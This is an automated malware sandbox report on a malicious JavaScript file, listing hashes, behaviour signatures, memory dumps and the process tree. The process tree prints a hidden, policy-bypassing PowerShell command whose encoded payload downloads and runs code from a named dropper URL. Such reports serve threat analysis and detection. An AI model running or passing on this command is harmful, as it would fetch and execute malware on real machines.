Analysis

  • max time kernel
    43s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    17/10/2022, 17:39

General

  • Target

    5a8f908de929fa670000c3c72a900288.js

  • Size

    66KB

  • MD5

    5a8f908de929fa670000c3c72a900288

  • SHA1

    b62fe78ce6c9cfe5040a8e94c522dcff7a43de4f

  • SHA256

    2ecee022c36e71313e1af91b039671ddabf56f2f28db3141e48d15dccf96064f

  • SHA512

    73cdc14322e7570fd835480e09211c3211eee9503368ec8a2567aec5b0c0f15c8628640f7cdab3de28a681cf2ef914b3c6874b48fa111ff6478d5bffa39c2543

  • SSDEEP

    1536:je6R4Qklp7XoRZ93vd3LjUlqFF0gx4iwgQBk6buzxF8z:jxPklp7cr3vJ/UlqFKgxtwgQBfbUS

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://8ltd8.com/doc/index.php

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\5a8f908de929fa670000c3c72a900288.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1932
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C poWeRShell -NOp -w HidDEn -ep byPasS -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AOABsAHQAZAA4AC4AYwBvAG0ALwBkAG8AYwAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1908
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        poWeRShell -NOp -w HidDEn -ep byPasS -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AOABsAHQAZAA4AC4AYwBvAG0ALwBkAG8AYwAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2016

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1932-54-0x000007FEFB7B1000-0x000007FEFB7B3000-memory.dmp

    Filesize

    8KB

  • memory/2016-58-0x000007FEF3420000-0x000007FEF3E43000-memory.dmp

    Filesize

    10.1MB

  • memory/2016-59-0x000007FEF28C0000-0x000007FEF341D000-memory.dmp

    Filesize

    11.4MB

  • memory/2016-61-0x000000000285B000-0x000000000287A000-memory.dmp

    Filesize

    124KB

  • memory/2016-60-0x0000000002854000-0x0000000002857000-memory.dmp

    Filesize

    12KB

  • memory/2016-63-0x000000000285B000-0x000000000287A000-memory.dmp

    Filesize

    124KB

  • memory/2016-62-0x0000000002854000-0x0000000002857000-memory.dmp

    Filesize

    12KB